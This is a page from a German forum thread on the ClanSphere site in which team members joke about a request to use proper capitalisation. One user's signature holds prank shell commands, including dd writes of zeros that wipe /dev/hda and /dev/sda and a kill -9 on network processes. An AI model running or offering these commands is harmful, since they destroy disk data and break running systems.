Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 29
Seite < 1 [2]
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 21 - 30.09.2006 um 00:04 Uhr
inso: hab ich doch auch so verstanden? trotzdem, 1. bin ich der meinung wie racor, rechtschreibung brauchen wir in der literatur, schule, job, sonst wo, aber nicht im forum? 2. ich will ehrlich gesagt gar nicht dass jetzt jeder versucht die groß- und kleinschreibung zu beachten, ich bekomm echt die krise wenn ich da nen haufen leute seh die alle aussehen als ob sie auf die rechtschreibung großen wert legen und dann fast alle schreiben wie die wutz


Inaktiv
|
pHaeno* ClanSphere Team
Thread-Ersteller


Geekboy





Beiträge: 1405
# Antwort: 22 - 30.09.2006 um 00:04 Uhr
Das eine kleine Bitte soviel Terror auslösen kann hätte ich nicht gedacht.

Mein ICQ dreht durch, was mir denn einfällt usw.....

Ich will hier niemand dazu zwingen hier seine Rechtschreibung zu ändern.
Es war doch nur als Tipp gedacht

Sry


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 23 - 30.09.2006 um 00:07 Uhr
^^ is ja auch nen guter tipp aber wenn man sich das alte forum ma ansieht solltet ihr lieber ne rechtschreib prüfung einbauen oder nen modul was prüft ob der geschriebene satz als deutsch durchgeht ^^

naja will damit eigentlich nur sagen das die gross- oder kleinschreibung woll das kleinste prob ist.

[alles kleingeschrieben, bin nen schlechtes vorbild ich weis :(]


Zuletzt editiert von equaL ClanSphere Team am 30.09.2006 um 00:07 Uhr (1x Editiert)
Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 24 - 30.09.2006 um 00:11 Uhr
leute ich kann nicht mehr vor lachen, sry phaeno



Zuletzt editiert von duRiel ClanSphere Team am 30.09.2006 um 00:11 Uhr (1x Editiert)
Inaktiv
|
maikoldi


Going for pro




Herkunft: Ottersberg
Beiträge: 545
# Antwort: 25 - 30.09.2006 um 00:13 Uhr
hehehe also ich achte da jetzt mal wirklich drauf


------------------
Visit:http://www.roundowner.de
Puplicons +-



Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 26 - 30.09.2006 um 00:14 Uhr
leute ich kann nicht mehr vor lachen, sry phaeno



also ich bitte dich das gibt später probleme bei der arbeit nicht dass das hier im mobbing endet


Inaktiv
|
maikoldi


Going for pro




Herkunft: Ottersberg
Beiträge: 545
# Antwort: 27 - 30.09.2006 um 00:27 Uhr
mobbing

Wörter mit -ing werden groß geschrieben
o lol (bitte nicht allzu ernst nehmen)


------------------
Visit:http://www.roundowner.de
Puplicons +-



Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 28 - 30.09.2006 um 00:30 Uhr
*räusper* klugscheisser *räusper*



Zuletzt editiert von equaL ClanSphere Team am 30.09.2006 um 00:30 Uhr (1x Editiert)
Inaktiv
|
h4ze


Geekboy




Herkunft: Itzehoe
Beiträge: 1433
# Antwort: 29 - 30.09.2006 um 00:36 Uhr
das wird mir hier zu viel spam, sry ^^

resultat:
wer groß- und kleinschreibung beachten möchte, der solls tun, wers nicht möchte, der solls sein lassen. uns moderatoren ist as egal.
man sollte aber vlt. bei offiziellen sachen, zB tuts, etwas auf die sprache achten.


/close.


------------------
gembee.com - Upload your Life!
A Social Filesharing Network
"Wie YouTube, nur für alle Datei-Typen"


Inaktiv
|
Antworten: 29
Seite < 1 [2]


Sie müssen sich registrieren, um zu antworten.